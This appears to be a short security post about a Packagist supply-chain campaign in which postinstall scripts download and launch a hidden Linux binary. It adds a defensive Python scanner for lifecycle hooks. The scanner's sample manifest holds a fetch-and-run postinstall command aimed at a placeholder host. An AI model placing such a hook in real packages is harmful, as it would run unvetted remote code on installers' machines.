Packagist: malicious Linux binary in 8 packages via package.json

Colleagues, please note: a malicious supply-chain campaign was found affecting eight packages on Packagist.
Socket reports that a postinstall script was added to package.json which downloads a Linux binary from GitHub Releases, saves it to /tmp/.sshd, sets permissions and launches it in the background, with TLS verification disabled for the download. The infected versions have been removed.
The attack is cross-ecosystem: the payload appears across many repositories and workflows, so scanners that only inspect Composer manifests miss it.
Why this matters: it can enable remote code execution during install or in CI.
Recommendations: inspect package.json, lifecycle scripts and workflows, pin versions and block postinstall.
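One way to act on the first recommendation, as an added example that is not from Socket or the affected projects: a small scanner that reads a package.json, looks only at the install-time lifecycle hooks, and flags the indicators described above (remote download, hidden file under /tmp, execute permission, background launch, TLS verification turned off). The sample manifest and its URL are constructed placeholders.

```python
import json
import re

# Hooks that npm, yarn and pnpm run automatically during install.
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Indicators matching the reported campaign's behaviour.
INDICATORS = {
    "remote-download": re.compile(r"\b(curl|wget)\b|https?://"),
    "tmp-hidden-file": re.compile(r"/tmp/\.\w+"),
    "chmod-exec": re.compile(r"chmod\s+[+0-7]*x|chmod\s+[0-7]{3,4}"),
    "background-exec": re.compile(r"\bnohup\b|\bsetsid\b|\bdisown\b|&\s*$"),
    "tls-disabled": re.compile(
        r"--insecure|\s-k\s|--no-check-certificate|NODE_TLS_REJECT_UNAUTHORIZED=0"
    ),
}


def scan_package_json(text):
    """Return {hook: [indicator, ...]} for each lifecycle script that trips an indicator."""
    scripts = json.loads(text).get("scripts", {})
    findings = {}
    for hook in LIFECYCLE_HOOKS:
        cmd = scripts.get(hook)
        if not isinstance(cmd, str):
            continue
        hits = [name for name, rx in INDICATORS.items() if rx.search(cmd)]
        if hits:
            findings[hook] = hits
    return findings


# Constructed sample mirroring the reported pattern; the URL is a placeholder.
SAMPLE = json.dumps({
    "name": "example-pkg",
    "scripts": {
        "prepare": "npm run build",
        "postinstall": "curl -k -sL https://placeholder.invalid/release/bin "
                       "-o /tmp/.sshd && chmod +x /tmp/.sshd && "
                       "nohup /tmp/.sshd >/dev/null 2>&1 &",
    },
})

if __name__ == "__main__":
    # Blocking the hooks outright is the stronger control: set
    # ignore-scripts=true in .npmrc, or run npm ci --ignore-scripts in CI.
    for hook, hits in scan_package_json(SAMPLE).items():
        print(f"{hook}: {', '.join(hits)}")
```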
How are you hardening your supply chain?
#cybersecurity #supplychain #DevSecOps #OpenSource
